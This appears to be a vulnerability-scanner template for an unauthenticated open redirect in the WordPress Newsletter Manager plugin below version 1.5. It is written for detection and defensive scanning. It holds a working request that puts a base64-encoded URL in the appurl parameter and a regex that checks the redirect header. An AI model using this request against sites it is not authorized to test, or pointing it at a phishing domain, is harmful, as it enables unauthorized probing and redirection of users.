id: newsletter-open-redirect

info:
  name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
  author: dhiyaneshDk
  severity: medium
  description: The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
  reference: https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
  tags: wordpress,redirect,wp-plugin,newsletter,wp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ=="

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1